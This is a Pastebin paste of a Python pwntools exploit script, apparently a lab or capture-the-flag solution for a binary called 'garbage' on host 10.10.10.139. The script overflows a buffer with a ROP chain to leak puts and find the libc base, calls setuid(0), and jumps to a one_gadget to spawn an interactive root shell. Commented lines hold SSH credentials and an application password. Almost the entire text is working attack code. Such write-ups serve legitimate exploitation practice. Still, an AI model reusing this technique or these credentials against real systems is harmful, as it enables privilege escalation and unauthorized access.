Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import sys
- import struct
- from pwn import *
- #context.log_level = 'debug'
- # First we remote to the host...
- # remoteShell = ssh(host = '10.10.10.139', user='margo', password='iamgod$08')
- # change working directory to /usr/bin
- #remoteShell.set_working_directory('/usr/bin')
- # set elf and libc paths
- elf = ELF('./garbage')
- libc = ELF('./libc.so.6')
- # get Return-Oriented Programming pointer
- rop = ROP(elf)
- context(arch='amd64')
- # get memory address of puts call and place it in the rop object
- rop.puts(elf.got['puts'])
- # get memory address of main proc and put it in rop.call
- rop.call(elf.symbols['main'])
- print rop.dump()
- # leakPayload = A * 0x88 (136 decimal) + What is this?
- leakPayload = 'A' * 0x88 + struct.pack('<Q', 0x40179b) + struct.pack('<Q', 0x404028) + struct.pack('<Q', 0x401050) + struct.pack('<Q', 0x401619)
- #print leakPayload
- p = process('./garbage')
- #p = remoteShell.process('./garbage')
- p.sendline(leakPayload)
- temp = p.recvuntil('\x7f') #weird input output thing, but probably first byte is x7f
- temp = temp.split('\n')[2]
- leakedPuts = struct.unpack('Q', temp + '\x00\x00')[0]
- libc.address = leakedPuts - libc.symbols['puts']
- print 'HOLA LIBC_BASE: ' + hex(libc.address)
- #p.sendline('N3veRF3@r1iSh3r3!')
- #password = 'N3veRF3@r1iSh3r3!'
- #0x0000: 0x2155f pop rdi; ret
- #0x0008: 0x0 [arg0] rdi = 0
- #0x0010: 0xe5970 setuid
- print 'SETTING UID to 0'
- setuid = 'A' * 0x88 + struct.pack('<Q', libc.address + 0x2155f) + struct.pack('<Q', 0x0) + struct.pack('<Q', libc.address + 0xe5970) + struct.pack('<Q', 0x401513) #setuid 0 + go back to auth
- p.sendline(setuid)
- print 'OPENING A SHELL'
- exploit = 'A' * 0x88 + struct.pack('<Q', libc.address + 0x4f322) #libc.so.6 one_gadget
- p.sendline(exploit)
- p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
